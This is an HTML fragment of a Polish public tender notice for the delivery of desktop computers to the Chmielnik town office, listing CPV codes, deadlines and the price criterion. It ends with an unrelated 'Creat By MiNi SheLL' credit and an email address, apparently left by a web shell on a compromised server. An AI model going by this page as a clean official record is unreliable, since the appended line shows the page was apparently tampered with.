<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa komputerów stacjonarnych na potrzeby Urzędu Miasta i Gminy Chmielnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa komputerów stacjonarnych na potrzeby Urzędu Miasta i Gminy Chmielnik.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com